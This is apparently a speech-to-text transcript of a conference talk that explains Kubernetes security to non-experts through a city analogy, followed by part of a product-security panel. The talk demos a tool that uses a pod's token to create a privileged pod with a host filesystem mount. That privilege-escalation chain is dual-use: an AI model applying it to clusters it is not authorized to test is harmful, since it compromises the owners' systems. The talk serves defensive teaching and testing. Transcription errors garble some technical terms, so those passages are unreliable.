Yeah. Yeah.
Are you ready to get out?
Yeah, I think
Can you hear?
I saw that.
Yeah,
that's a lot.
That's right.
Hey,
Here
we go.
You ready? Are you ready? I don't think this one does not. >> Hello.
>> Okay. Are you ready? >> You're ready? Okay. Is everyone ready now? Cool. Excited for the second half of the day? Yes. Show please how you're excited you are and especially for the next talk. Yeah. Okay. That's not really really strong excitement but well sure. So um very excited about the our next talk. It's actually was one of the talks that was really memorable to the whole uh CFP uh committee. So and it's something that would probably speak to a lot of people in the audience. uh simply because they want to they want to explain what they do to their kids and I guess that's sometimes very challenging when you work in security to actually be
able to translate that to someone who doesn't understand uh any principles. So uh and we're going to talk this time about Kubernetes which is a bit indeed kind of gray area for a lot of people and Lars here is going to present it to you in a very approachable way. So please give a round of applause to our next speaker Lars Lev. Nice. Nice nice. Hello. Hello. All right. That puts some pressure on I'll tell you that. Uh good. Well welcome everybody. still a lot of people here. Um so that's always nice to see see the interest in Kubernetes security or you've chosen the wrong room. It's you know either one of the two. Um anyhow um I'll be talking about
what I tell my kids about Kubernetes security. It's not like your um yeah standard conference talk. I'm well aware uh of that. But the the origin and the ID kind of becomes um well it has a story u attached to it. Um, so you know, let's see like it it's like a normal Monday that that you get to work, you know, the normal like day-to-day, you know, sometimes boring stuff like team meetings, yada yada yada. Uh, but let's say like in the afternoon you got that like little security incident. Not not too bad. Uh, but you have to do some investigation, write up a postmortem. Yeah. Nothing too special. It's all fixed. It's all done. You get home. um
you know, put in some slowcooked meat, make some dinner for the family, all nice, all nice. Then the conversation comes up, you know, you're at the dining table with the kids and and and the wife or um the mister. Um and then the conversation cames up like, "How was work?" You know, and I'm sure many of you can relate to that. How was work? And you start talking like, "Yeah, you know, the normal stuff, team meetings, stand up, blah blah blah." Uh but in the afternoon we had like a little you know little security incident where like we detected some malicious activity and in one of the one of our paths one of our containers it was like um connecting to
a C2 server. It was like yeah really weird traffic. So we adapted some egress rules to like you know close off uh the connection. Then we exported like the uh um the logs we investigated into our um yeah into our analytics platform. and you're so passionate talking about it and you're looking up and you're looking at your wife and she's like uh what and you're looking at your kids and they're like already like falling asleep and then you know you know you know you kind of have a problem or your message is not being like delivered very well right um so that's my main point is how do you take such like I'll call it
complex you can make it even more complex obviously um such a complex tax technology and try to explain like the security concepts. I will not explain them all. They're just too many. In a very approachable and in a very like understandable way using like everyday analogies. So that's the main purpose. Yeah, that needs to be turned on. A little bit about myself. Uh I come from the the south of the Netherlands, like the the the country of the of the good chocolate. Um, I do love everything that relates to cloud security, application security. So, I really do have a passion for that. I do cloud security at ING. Um, so mainly working on the GCP stack
on the Azure stack. Um, doing some security stuff over there. If I'm not behind my computer doing weird stuff, I u tend to play uh play the low notes on my bass uh from time to time. uh you know do like some uh sports as well paddle tennis and if I don't sleep at night I uh watch uh NBA games that's the main gist of things good every to story starts with once upon a time don't it um so what we'll do is we'll take the whole Kubernetes concept and we'll relate it to a city right we can see like the Kubernetes the cluster itself as a city right um so we'll call will enter in Cubetown. Cubetown is a
little inspired by Amsterdam. I'll tell you that it has the beautiful canals. It has the bridges. Uh it doesn't have any bikes in the canals. At far we cannot see that. Uh so that's a good thing. In Cubetown, you have a couple of things like you have um the city hall, right? Uh where the mayor resides. Um some other things are in there as well. You have the city records. Yeah. the the archiving of of the city is stored there. Um we have you know Cubetown is all about apartments. We don't do houses. So it's really inspired by Amsterdam. It's all apartment blocks and apartments itself. Um so if you see very well on the picture the Kubernetes
concepts are like highlighted uh very small uh so keep them in mind uh memorize them if you will. Uh so we have apartments which are pods. We have name spaces which are like logically separated like pieces uh across nodes. Uh we have the apartment blocks. We have traffic signs. Yeah. Where do we need to ride with our bikes? Uh where do we need to stop? We have the lights. Um so that's basically you know uh cube time. Now what we're going to do is I selected a couple of scenarios uh like security wise scenarios and how we can abuse our city. How can we break stuff in our city? Right? Um so we going to look at
abuse cases of our city and then we are going to check how can we fix that. Right? The first scenario we have is our lovely Suzanne. Um drives a little bike. Um Suzanne is not a citizen. I mean she doesn't live in in Cubetown. She's you know from somewhere else like over uh or Rotterdam. Um, but our city hall is publicly available, right? You can just take the bike, drive towards our city hall, no big deal. No gates, no no anything else. Uh, she goes to the city hall and says, "Hey, I want to request an apartment block um in Cubetown, right? How does that look? Technically speaking, it looks like this, right? You have a curl request. Uh, you call the
endpoint like the API server of Kubernetes, which is the city hall of Cubetown. you say like hey I want to do this and this uh deployment yada yada yada um some some name space some uh some name some properties attached to it right there so that's what Suzanne does what's the response you get the response you get is sorry Suzanne it's not going to work right why is that it's forbidden um you're in the user group uh system unauthenticated translated means you cannot do that right you're not part of Cubetown get out you know it's very like greedy city. Only people in inside of the city can do that. What are the lessons we're learning from that is well first of all
um don't make your city hall publicly available, right? Make it only available for the people living inside of your city. Like only allow requests uh coming from people inside of the city. So we can build a gate, hire guards um to strictly um you know build gates and uh guard rails and all that kind of stuff you know in technical terms that basically means you know don't expose your Kubernetes API to the internet right it's a little warmup was an easy one right the others are going to be harder scenario number two right uh our friend Thomas here he lives in the apartment so recall apartments our uh pots. He lives in the apartment. He's a curious guy.
You know what does curious people do? You know, they look around, see, you know, what's in there. What does he find? He finds like a little like wall uh where if you like scratch a little things away, he finds a hatch towards like the building utilities like of the apartment block itself, like with the electricity u like casket with like um the blueprints of the building. They got all kinds of nasty, you know, information, right? Some things you don't want apartments owners, you know, to see it, right? So, in terms you could say that the apartment itself is misconfigured, right? It shouldn't be all walls should be properly closed. It should be like isolated from um the building utility
services, right? How does that look like in technical terms? There are multiple ways um on how you can misconfigure your pot or deployment. Deployment is just multiple pots basically. Um first of all that's this one. That's like if you need to name the most famous um misconfiguration it's probably this one. Uh arguably I mean up to discussion obviously it's security context um privileged flag set to true. What does that mean is you have the whole like isolation thing of containers like they run on their own like a little little box um that that's purely isolated. If you set this flag to true, you know, you can throw all your isolation concepts out of the wall. It
basically means that your pod your container runs on the underlying host itself, right? So that's a very dangerous property to set. The good thing, you know, it's not all bad in security. Um the good thing um it's not true by default. Uh so it's true it's false by default. You have to explicitly like enable it to do stupid things, right? That's the main gist of things, right? We have the security cont. Then we have host network host P ID host IPC difficult terms. Um the good thing about this as well, it's not um set to true, you know, by default. It's also like false. Uh so if you just don't do anything, you know, it's fine. Um what
do those things mean? Um a host network. Uh that basically means that your pod that runs on um the underlying host can like um you know sniff network traffic uh from all the underlying um all the all the services running on that host which may not be ideal in some cases. You have the host P ID which means host process ID uh which means that um pods apartments running on the underlying host can like expect um processes running on that underlying host you know for some use cases it may be useful for most it doesn't right and then you have the host IPC which stands for interprocess communication that means I can you can expect uh things like shared
memory and all that kind of stuff know it goes a little bit too deep I'm aware Um but the main gist is if you don't need this you know just keep off right don't do this next one right security people if you tell them the word like root they always like uh what um you know containers also have root obviously right and there are there are multiple layers to it um one of the layers is well in order to build your container image you need a thing called a docker file right then you specify some parameters yada yada yada um and there you can if you don't specify anything your contain your container mostly runs
just as a root right so if you specify a certain user um that is not zero um you you explicitly set in the docker file to not run as but if you then move to the the manifest itself So this file is used for deployment purposes. There you also have a couple of properties. Um and I find the first one very like confusing. It's like run as nonroot. Yeah. What does that really mean? Um so run as nonroot um set to true means that even though let's say in your docker file you set like you can run as root it's all fine. If you specify this as true and there's like you know a mismatch here you say
like hey you run as root. here say h don't worry so your container will just not start right um so make sure in your docker file to put in a user or there are other ways to do it as well um specify it here to run as nonroot as true uh or you can just specify a user here um as well um that is you know best practice obviously uh to not u you know enable root user there are cases obviously where you need to do that, right? So, it's not like the silver bullet like no root, no root. No, there are cases like if you deploy security monitoring tools, there are cases where you need to
do this. Um, but you know, validate them on a use case per use case, right? So, this is also a misconfiguration or a possible misconfiguration. All right, another thing and we're talking about volume mounts, right? Um, and that's a very dangerous And I I'll show you in the in the demo as well how this works. This one in combination with the privilege flag true the famous one. Yeah, that's a very dangerous one. What does this mean is since the privilege flag is set to true, it runs on the underlying host, right? The apartment is just part of the entire building block. Uh but if you specify this, you basically specify the whole file system. So everything juicy of the apartment
block itself mounted to my pot. Um so if you do like just backslash basically means you know the whole shebang. Um mount it to u my pot under the under the pod slhost. So all the juicy information of my apartment block has been like lifted and shifted um into my apartment itself where I can just you know easily inspect all that juicy information which is not ideal uh but that's in combination with the privileged flag good all those misconfigurations nasty things how do we uh find a solution for that right we can teach the guard at the city hall um to yeah determine let's say some people request an apartment or anything else. We can set up like
requirements call it even a legislation if you want to. It's up to you um to say like you need to meet this requirements if you uh want to build an apartment. If you don't 100% meet your requirements, well, you know, come again later, right? Um how can we do that? And in technical terms you have multiple things but one of the important thing is spot security standards. Um they come in different flavors like more strict less strict uh how you can apply how you can enforce that. Uh you have tools like Kyiverno. Who heard of Kyivero? Who some people nice uh you have open policy agents. I think more people heard on on of open policy agent. uh you can
use those admission controllers to set that legislative to set those rules. um if they apply if they say like hey I want to make a resource you know what are the rules you should comply with uh what are the properties you can or you cannot um set right that's it for uh scenario number two you're all still with me right nodding faces nice uh good scenario number three we're talking access control um the mayor the mayor of our city of of Cuba he holds like a golden key like a very famous you know everybody wants really wants the key um because it can open every door whether it's the apartment itself whether it's the entire
apartment block um whether you know you can even with the key don't ask me how but you can change like the traffic lights you know a strange key um you can do multiple things with it right um obviously we're talking on about access control right um so somebody stole the key is able to do basically everything right on the cluster Then we're talking about access control in Kubernetes and we have a couple of concepts that are very important to understand. The first one first one this sorry the first one is a role right the role by itself is just a role definition. So what's in the properties here you have um yeah the kind is role
you give you give it a name like pod reader namespace I'll talk about namespaces later um but then the rules you basically say like I get some verbs like get list watch those are like the actions you can do on a specific resource so with this role you can get list and watch pause right it's just the role definition Right? You're nothing with the role definition. So what you do with a role, you assign it to something, right? And that's when a role binding comes into play. So a role binding is you take the role definition, you take like a principle, whether it's a service account, a user or a group, it doesn't really matter, and you're like combine
those those two together and you get a role binding. So here we specify the role binding. Uh give it a name as well. uh we have a we chosen for a service account uh which is the the most common use case I would say and we link the specific role we just created rights and role bindings are namespaced objects like namespaced object what the hell is that uh remember the image of my town right there was one layer across two buildings right That was a namespace. A namespace is basically a logically separated like call it a box but logically separated like area where PS can live in. Right? So in the in the image in our in our cube town uh we have
like floor number one. It's just like logically separated. They can run on different uh apartments but it's like you know a piece of their own basically. So roles and ro bindings can only apply on a namespace level in that particular like logically separated box. If you say like I don't really care about name spaces I want to do it for the entire cluster for the for the full shebang then cluster roles come into play right cluster roles basically the same principle as normal roles only it's on cluster level uh well it doesn't inherently always is the case but I'll leave that for now. Um here I have a cluster ro called full-blown admin. Um same things apply. We have resources, we
have verbs, right? Since we're all security folks, star star, that's all good news. Um that's basically everything, right? And security terms. Uh so this role is just like, you know, that's the golden key we we talked about. It's just you have access to everything, you know, go loose. With a cluster role, you obviously have a cluster role binding like the same where you have like the role and the role binding. You have the cluster role that um binds to a certain principle. Uh so the principle is the same. We have the full-blown admin uh binding here that binds a service account um to a cluster role. Hard question, why is the name space here? >> Because cluster roles are on the cluster
level. you know, think it through. Think it through. All right. Resolution, you know, yeah, it's basically access control 101. You know, principle of lease privilege. Don't have like one big golden key that that does everything like make very fine grained keys for each individual purpose uh on its own. Uh and don't do stupid things based on on access control. Um it's a um it's as simple as that. It doesn't always have to be hard, you know. Good. Last one. Like an I'm most excited about that one. It's my favorite scenario. Um that's and we all we all we've all been there. I'm pretty sure like you have some some chores to do at your home or at your city. Well, you do,
you know, um I have those hands. I cannot do, you know, much. So, I call someone to do it for me, right? Some plumber or some electrician. Um so hey you can you can fix my electricity you know it's crap um you know you can fix it but you know those people are most of the time same as it is in high demand so they respond like yeah I can come but it will take like yeah one one year I'm like yeah dude I cannot wait one year you know to put on my heating uh so what I do is I go on the interwebs obviously I start looking for like um yeah electricity people or plumbing people
depending on what I eat. Search it in Google. First hit I I got is like it's it's advertised. So that basically mean it's always good. You know if it's advertised it's probably always good. That's not the case by the way. Um it's they're called they're called the super speed plumbers. That's good. I need plumbers in my in my city. Give give them a call. They come in. You may already expect it. Super speed plumbers are not like the best plumbers in the world, you know. Um they're like nasty. They have other plans as well, right? Um, so what are we talking about here? Um, we're talking about supply chain attacks, right? Um, and this is like um a little
deployment uh YAML and I'll challenge you to to search for the mistake. >> Microsoft. It's not Microsoft, it's right. there's like a little typo in between. Uh so it's maybe because you're sitting so close that you see it. U but that's something to be very cautious of and there like a whole plethora of supply chain attacks nowadays. Uh but that's just one example is you know be very cautious of like what container image you know you pour in right check the integrity of your check how it's built from where it comes right you have like multiple frameworks for that. Uh, one of the things I'm most excited about is a salsa, uh, SL uh, SLSA, supply
chain levels for software artifacts. It's amazing, you know, search it. Uh, go for it. Um, that really shows you how to how you can guard against those type of threats. Uh, this is just like one, you know, simple example. It's but it's to make a point. Um, right. Uh, if you just like copy paste or, you know, the whole software supply chain is, you can make like a conference on its own uh, on that particular topic. Uh but the main idea here is what we want to do to resolve this is we should have like a trusted list of um like suppliers that come in, right? We have we should make like I'm here again with my legislation.
I'm sorry for that. Um we should make like a legislation that says like um you know we have a list like an approved list of what container images we can use what suppliers we can get from our chores in our city right we can set up whatever you want like a proxy server that that can pull in and we can we can expect inspect those kind those type of thing for what's in there um so we should have that trusted list of um container images that we can pour in next to that if they come in into our city, we should inspect their toolbox uh because there may be like nasty device and you know, you never know uh which
basically like means, you know, check where the container image comes from, where where it was built and do like, you know, vulnerability scanning on your container images as well. See if there's like anything like nasty uh popping up that you don't want in your pro in your production environments, right? Um so that's mainly like resolution. Um, number four. Good. Still entertained. Uh, now you may ask yourself like, "Yeah, all good and well, uh, Lawrence, nice stories." Um, but how do we make sure, how do we validate that those security controls that we discuss like briefly discussed are in place into our, you know, current environments? How do we val how do we test it? You know,
because it's good to know the theory obviously um but without like proper validation or security testing we already know, right? And that's where a tool uh we buil we built the the one that built is hacking the planet up there um made uh it's called Kate uh it stands for uh Kubernetes auto exploitation tool uh and that's like the main diagram. So what it can do is it's mainly used to run in non-privileged uh or non- like accessible environments, right? Um so what it can do is it it takes um like service account token it it takes like access tokens it takes user principles and it validates what that particular like access token can do because
nowadays you know basically every attack in the cloud starts with like identity u whether it's a compromised service account whether it's a compromised user account you know basically everything starts with uh identity or software supply chain you know you can choose um so So it takes um a service account key. It uses that to enumerate all the privileges and all the permissions that it has and it has like uh the tool has like pre-baked in attacks um that it executes based on what roles it has. It's very nice. I'll show you. The good thing is it's compatible with every CSP. You know why is that? Because it runs on Kubernetes. So it's Kubernetes native. That's the only buzz word I'll use.
Sorry. Uh so it's Kubernetes native. Um so whether you want to run on AKS, on on EKS, on GKE, on your onrem Kubernetes, it doesn't really matter. Um it's um applicable to all environments, right? Good. What's part of the whole setup? Uh so if you clone our repository on GitHub which I advise you to do if you have an interest um there is a whole demo setup attached to it. This is the the the demo setup. Um where it comes from is um it was set up for like a hacking conference uh in Poland a couple no one year ago two two years ago. Um, and the main idea was they had to exploit or pentest this
by hand, right? They had to do they had they have a nice website and nice nice UI where they had to find like a command injection vulnerability. They had to like private they had to go into uh the SAM pot then they had to like discover oh the samp has like exceeded permissions that can do nasty stuff on a different pot. They had to move laterally. So that was quite the attack chain that they had to uh complete. Um and that's why uh we well he um you know made this full autonomously uh that with the with the tool this whole attack chain can be like gone and Kate itself does the exploitation of this
automatically right. Uh, good little demo like you know how it works. Demo gods.
All righty. That's a little small, I suppose. Cool. What I have here already like pre-installed because of like internet issues. um our cluster if you want to play around with Kubernetes just uh just for the fun of it. Uh there is a thing called uh kind. Any people know kind? Yeah, the same that know Kyverno. Nice. Um kind stands for Kubernetes and Docker. So it's not a very gentle thing. Uh well maybe it is. Um but it's just like Kubernetes that you can run locally on your u yeah on your PC. Play around. It doesn't matter if you do stupid things. Just delete and uh rebuild because the whole thing of Kubernetes is that it's declarative. Everything should
be in code. Um, so that's the whole thing. So what I have here, I have uh the jackpot. That's like basically my end goal. Uh, I have um the Froto part in the name space uh uh pro and I have the sand pot in the pro name space. Good. I'll just because I don't know by by uh by hand how a normal like pentest would happen is um they go inside of the um uh SAM pod they exec into it. So they are inside of the container and from there on it's like um yeah lay of the land as they say you know you don't have anything you just you know need to start playing and see where you uh where you
end up. So in order to run um Kate, you'll need a service account token. So basically like a user principle um because yeah, you need some identity to test on. Uh so what I did here is I exact into the SAM pod uh went to that particular uh file to obtain the token where my pot is running from. Good. Then I need the API server. All right. This is just basically the address of my city hall basically. Um, and then I run Kate. See, nice logo. You have a couple of properties here. Uh, so what I'll do is Kate slashu for the URL.
I now know how it feels when 100 people are looking at your uh uh at your screen. Minus D for token.
All right. Slash K. Good. It's starting doing stuff, right? All very nice. all very fancy. Uh so it's basically like iterating over. So it takes that service account key, it takes that service account token. It looks like you know what permissions do I have? Right? When we talk about access control, those roles, those role bindings, those cluster roles, those cluster role bindings, those are the things it's looking for like what can I do? That's basically like every attacker's mindset, you know, when you're enter somewhere, it's like what can I do? you know, you look around, you start looking around. What permissions do I have? How can I um, you know, start escalating, start moving laterally,
start doing Yeah. nasty and and and crazy stuff, right? It does take some time. I'm not sure it will work because it's for the exploit to work, it needs to well, it's basically written here. It needs to create a pot. Um, and how you create a pot is yeah, you take a certain container image from somewhere. Um and since my internet is not very well u I'm not sure if it will you know get the image. Um but anyhows you get the ID. I can show you a pre-built uh recording as well. So here it all does uh for the people that are deep in the weeds of Kubernetes. It does self-s subject reviews. Um
yeah, to get uh to get those permissions, to get those um yeah, things on how to um how to escalate. Um yeah, I'm not sure if it will work.
Let me validate I was right. Right. It's container creating, but it really takes a while because the internet is not um at least on my PC. Um so it creates it found an attack pot. Um that it can it has the permission to create a malicious spot. Uh so it's starting to create a malicious pot here. Um and that pot will have a very nasty configuration. You remember the privileged flag to true in combination with the volume mounts, right? You remember? Good. Uh so we have it will have that particular uh combination. So it will be able to access things from the underlying host. That's where we that's our end game. That's where we want to be.
It's still in creating phase. I'll just switch to the recording. It's always good to have a backup plan.
So that's where we were
running itself.
Uh no valid exploits found. Uh exploitation starting exploiting uh resource potre all right here you see my malicious pot has been created so I see Kate mal I'm on for for the screen Kate malicious has been created here so here it is running I do cube cuddle exec I try to go inside of that pod uh to see if the particular volume mount with with the proper misisconfigurations in place is mounted into that malicious pot. So ideally if I go inside of the pot I should see the file system of the host where I'm running on. So I go I'm in I go to cd/host at etc kubernetes and there I can access the cublet conf. I'll spare you the details
but the cublet that is something that runs on uh the node on the host um itself. So from the pod on I should not be able to access that. So my exploit worked um which is nice. Doesn't didn't work in real life. Uh, but it worked on the recording. Good. All right. Well, >> that's it. >> Thank you.
>> Awesome. >> Thank you so much for for your presentation. Maybe we'll have couple two minutes left. So, if we have any questions, does anyone have questions? Yep. Uh so first of all thank you very much that was a it was a really great presentation and uh thanks for giving a framework for how to talk to my 20week son >> all right >> about about containers one day really appreciate it. Uh first question is uh do you intend to show that demo to your kids as well and how smart are your kids? >> Uh well the whole thing I'm going to burst a bubble here. I don't have any kids yet. So that that's the whole but I'm when
they're when they become alive I'll tell them. >> Awesome. Okay. So the the actual question um I believe I've read that about 60 up to 90% of of the the software running in a container is unused never loaded into memory meaning that we have a majorly expanded attack surface for with no use. I'd love to hear you opine a little bit about that if if you could >> come again. not fully I'm not sure I fully understood the question. >> Uh so the um the components on you you mentioned salsa a quick for a quick time there with software supply chain. Yeah about 60 to 90% of the components within containers never get loaded into memory
are never used at runtime. So I'd love to hear a little bit of your thoughts just around that. And I'm sorry if I opened a can of worms. I >> you opened a can of worms. Congratulations on that. Uh well, first of all, it is true, you know, a lot of things that that reside in container images are never used or never like loaded into like the real runtime. Um how you could uh and that's like, you know, we're not going to fix that problem overnight. uh far from um but my suggestion would be is you have so many like um yeah I won't mention any commercial players but like base images that are so stripped down to what to
what you actually need instead of like using like you know rail 8 or dbian like you know the big uh like you know tractors basically um as as a base image for your container. So what I would suggest is really strip down um on base image um to make your container image because there you already like lower attack surface for like 70% basically and then really install whether it's in your dock file or somewhere else like the components that you really need. Um in that way you're limiting kind of like the attack surface either way from like noisy vulnerability scanners or or whatever. Um, but you open the can of worms, it's not like, you know, a
problem that will solve overnight. That's that's for sure. >> Yeah, we're good. Okay. Uh, maybe one other question. >> Yep, we're good. Okay, perfect. Please give a round of applause to Lars.
putting and I realized that could have been AI. I don't know if it was for effect but then I made made him realize should I put AI as a decision maker for anything just for now I don't think it's a good idea so we use it for basically getting insights and for that alone is already extremely powerful right so yeah make sure you look at that as well AI is an assistant right so it's something that helps you realize something quicker vibe coding anyone right so it it goes quicker um just yeah there needs to be a human in the loop at one point or another to make that decision or not. I absolutely agree.
>> I do think um yes AI is is an assistant. I guarantee you all of your your developers are looking at agentic AI in some form or another and that's going to take off and getting a handle on that again not stopping it but really having the conversation and talking about it because the analogy I used the other day was imagine giving dozens of foury olds like scissors and just letting them run around like that's what you're doing with AI. agents, they're just going to go around and start knocking on things and whacking on things, right? Um, and they have access to everything. So, getting a handle on that, helping developers understand what are the
threats of agentic AI, what can they do, and then figuring out how to monitor and making sure that, you know, you don't have a bunch of four-year-olds, then creating more four-year-olds and giving inviting more four-year-olds over and giving them all scissors, right? So that that is going to be a really important thing because slowly but surely the human's going to come out of the loop because people are going to say, "Oh, that worked and I'm just going to let it run and it's not going to work." >> I I wanted to complement uh what everyone said here with an aspect that I think we're not thinking about which is the attacker side. Right? used to be
that we had a little bit of a distinction of staked actors, you know, the more sophic sophisticated thread thread actors and then some interesting groups from here or there that were more sophisticated. Now it seems like everyone the same power the types of the types of attacks that we're seeing now are a lot more sophisticated. Uh I was the other day talking to uh some people in cyber defense in our company and I was discussing with them um how to you know improve our filters for for a lot of things that we have basically I cannot talk about it right now but what I heard from them is the level of attacks is a lot higher and uh we can
definitely see a lot of trends that the attacks are pretty similar because of AI but they're not exactly the same sometimes they're just they come from everywhere um there was one day that someone was trying to create u many types of accounts uh website to pay for uh subscription and try to cancel it and using AI to create many different accounts. Uh we have many different emails with many different everything like 100,000 accounts or something and they were trying to very quickly on a on a runtime condition trying to get the the the refund and then use that money before it was realized that before I realized that they actually didn't pay for it. It was just a um how do you call
it? I forgot the name of that but in English. Sorry. So they signal, sorry. >> Yeah, it was a race condition, but they they were trying to make it look like they paid and then trying to get the money back quickly to then use that money quickly. >> Frauding. >> Yeah, it's fraud. Yeah, but I was trying to be more specific. You're right. >> Yeah. Yeah. Yeah. Exactly. But then what did we do? We realized that we already had the defenses in place because we had threat modeling, we had secure design from the start. So product security or ABSSEAC, what you want to call it is a life cycle thing that you need to think
about. So in AI it's the same thing whenever you're going to start with AI do the whole thing you're going to find a lot of things we had a situation also where we wanted to implement AI in a specific port portion of a website and then realize that a lot of queries were trying to get our AI to say stuff about Israel Palestine or other things to make it look like Albertine is making a statement. I'm very glad that we managed to escape that hell but it could have been really really bad right? So attackers are also using it. Don't forget that. So if you don't then you're going to be left behind. That's actually
the perfect intro to the next question which is uh the most voted one on the Q&A with 12 people who really wanted you to share your war stories on how did you fail to secure your product in the past and what did you learn from it? Who wants to get started? >> Oh dear. It's my own mistake. know just making a website for in PHP based stuff way back when it was still 1.0 or something similar. Um and I just realized that I just opened everything up to the world and within minutes back then already it was already gone. So it's it's not a real war story. It's just stupid mistake which most of them
are. >> Well, you can give someone else to share their story. Yeah, I was going to say I'm very young, so my day to make those mistakes is still coming. So be tuned. >> I think I'll be lucky. I don't I don't think I ever I was ever working somewhere that were hacked at that moment in a you know in any spectacular fashion or anything like that. Um I've had incidents of availability like DOS or DOS that someone found a bug and realized that you could make our services stop. basically was not too bad to be honest but DOS yeah a lot of companies but that's not really the mind view that people are looking to uh make
us walk through right to to talk about the yeah so nothing really to to share honestly on that sense >> I do um so and it's not it it wasn't it wasn't me and it wasn't a again it was not a security vulnerability um it was a business log logic issue that resulted in a not a wasn't a brief so I'll just say it. So um the way that the website was set up at a previous retail company um would say if the if they couldn't fetch the actual cost of the product, it would throw up $10,000. Just thinking that because there was an assumption that you know if it's a pillow, nobody's going to
pay $10,000 for a pillow. Um, that business logic error didn't cause a breach. What it caused was a disinformation campaign that hit us pretty hard. We were accused of um trafficking children in cabinets. We were not, by the way, and please don't go Google it without using an incognito browser. But the the damage that can be done by not thinking through and again it wasn't it wasn't a security vulnerability. It was just the team was like, "If we can't figure out what the price is, we'll just throw this up. Nobody will ever pay that. Nobody will believe that that's what it is and we'll just see an error message." And it created I I have never spent so much
time on the phone with the FBI in my entire life. And I don't choose I really don't wish to do it again. So those are the kinds of little things that people don't really think about that that from a product security standpoint, it wasn't really a security thing, but it caused a really big security problem. It led to people trying to dodo us, people trying to break into warehouses to free the children that didn't exist. So it was it was a very long uh it was a long week. So and it still comes up every now and then. We did not. We were not. I promise. >> If you want to hear real war stories,
don't put us on the stage here. >> Yeah, that's what I was thinking a little. >> That that one's public. They're a whole other can't talk about. >> So, yeah, you can come to them afterwards and ask them private. Well, the 12 people who asked that question. And uh well the next question is actually also reflects on what Leandra mentioned about hiring someone and make them grow within the company because a lot of people also want to know uh how do you retain grow and support internal talent and careers since product security needs both business and tech knowledge making on boarding long and costly from anonymous. >> Yeah. So uh we actually have quite an
intensive system with that. Um so there is the product security community where you can choose uh if you're interested just to join and that's where you would get the basic information of how is a product secured or what is going on in the in the world right now. Uh and besides that there is a a full track on how you can improve your product security skills. So it goes from awareness level on what is in the security development life cycle to at some point you can become a representative where in order to be that you need to do certain workshops like you need to be able to uh hack the OAS top 10 you need to know about uh
embedded system securities and from that moment on you can grow onto a master and an expert level by engaging with other groups for example about quantum security or uh do a project together with research. So in this way um a lot of training and a lot of uh group culture there is provided and there's also a stage for it. So through this community you can request to do a webinar and you will have people that are interested in the same topic for a discussion which can be anything from from tooling to um hey I have this uh new AI let's try and social engineer it type of thing. So we do it through through fun and training.
>> That's very nice. Uh I honestly applaud what you have already. I think it's really cool. In u in my perspective, I noticed that a lot of the smaller teams, they have a bit difficulty some a little bit of a difficulty sometimes on um on mentoring more junior people. I think that uh that is the the main difficulty. I think there's a little bit of a a wall uh from junior to meteor when it comes to product security. I think it's difficult to reach that stage without some help. uh I think it is a difficult field when it comes to knowledge. I think that is somewhat simple. You can get any type of engineer that is not a
security engineer and then turn them into a security engineer. The the security knowledge of it is of course difficult but not it's not that lengthy. You can definitely study it in a in a year or something like that and you already become extremely useful. So that's one approach. You can take someone that is turning their career around and uh starting in security. I think there's a lot of people interested in security. I would advise you give them a chance. these types of engineers, they're often the most passionate professionals you can get, right? One and I also have people starting out in their first uh security uh um role ever that you see that they wanted to do this
their whole life. It it was made it was meant to be. So really take advantage of passion of people in in a good way. I should say take advantage of that because passion people will be the best teacher, passionate people will be the best culture uh drivers. they will be your best allies for it and when you're talking about knowledge again it should be uh something that is a bit more organic in my view uh so that's why I like like also what case was talking about because I believe in more organic knowledge that you discuss it that you talk to to each other I'm less of a believer on courses I think courses are
extremely important certifications as well but I would say that the the the core knowledge that you get in security is self-learn self-taught perhaps and um a little bit discussed between the team so I I would heavily um well advice and also um we've been having a lot of success with that which is having our own uh security discussions. We talk about uh security principles, what kind of how do we do security by design. Uh we go over the OASP uh um frameworks that we have. We go over regulations. We go over all of these things together. Of course, sometimes it takes more time than we're expecting, especially with NIST 583 53 853, sorry. All of the
bigger ones will take a lot of time, but I can definitely tell you from experience, it's worth it. >> Just to add on that one. So, I think as a as a leader, manager, whatever, I think it's always very very nice to see people grow, right? So, it's I think if you can manage that, if you can see that part, uh it's very very rewarding. So, for me, it is about embracing failure. So, fail fast, extremely fast, learn fast. That's the key. Um especially if you have people that are very passionate, love to question things, love to figure how things work, those are the best people to try and get and those are mostly the very very young
people that are not working in security right now. Um either from uh I had one person that was working in came from that had a cognitive science background. Oh my god, that's amazing. Especially if you'd have put that part on on um on um security awareness and fishing and those type of parts. Oh, that would be fireworks. I can guarantee you it. Um so so absolutely do that. >> Yeah. Uh I wanted to add to what you're saying. Something we did recently is we organized two events. One was a one awareness level. So you have people from marketing coming in and asking questions and you can see a little bit about who's security aware and who wants to know
more. Then another thing we did is um we put a very low barrier entrance uh workshop uh which we called capture the flag but it was basically here's three hours of your time any level can do this because we made sure it really starts from the beginning and everybody and anybody is welcome. So we did that training and at the end of the training we explained now if you're in if we sparked that security passion in you which definitely happened with a few uh please reach out because we can help you expand further into it and that definitely recruited quite some developers into the security side was really successful. >> So we have three minutes left and 20
more than 20 questions. So I think you'll have some time to ask them personally after the panel. Uh so I'm going to pick maybe the the last one which is very interesting as maybe something Marty just discussed also together. So how do you scale a small prospect team to an organization with hundreds of developers >> to me? >> Yeah. How do >> how do you scale that? >> Yeah. How do you scale that? >> Oh that's difficult. Um yeah, if you >> you want to go first? >> No, go on. >> I'm thinking as like I said, it's difficult. I just trying to figure wrap my head around it. >> It's very difficult. So I can tell you
from experience that what we've been doing actually because our team um we have security functions in in other parts of the organization, but we're starting a team also more specialized in this in our client. So it's a smaller team that needs to scale from the start and it started with three people was very difficult to scale with three people but we managed uh we have three laws for it. So the first one is make sure that everything that you do is simple. Uh that is as a service right. So as threat modeling for example threat modeling is something that actually normally requires a lot of your time. So make it simple make it that they can
take steps they can adopt it very very quickly but they have to maintain it of course over time and it's a live document. Then you get the benefits of it over time and it gets actually pretty deep when it comes to their threat model. And the third one is you should never be managed to marish married to your efforts. If something is not um addressing risk enough or is just too difficult to maintain, something like this that is not bringing you the benefit that you were looking for, drop it very quickly. Drop it like it's hot. So, first one, yeah, simple simple really MVPs everywhere. Start it start improving after the fact after you uh
launch it and then the second one make it as a service. So, our teams for example, they don't need us for threat modeling if they want to. They can do it by themselves and they love it. They can be self-empowered, right? and then you can scale. If you're dep if everything you do is depend on your team then you're never going to scale especially if you have three four five people in we have thousands of developers that will never work. So uh to be able to do that allow them to um be self- served and then when they need your help when they need specialist andme at the meeting as subject matter expert then then you'll
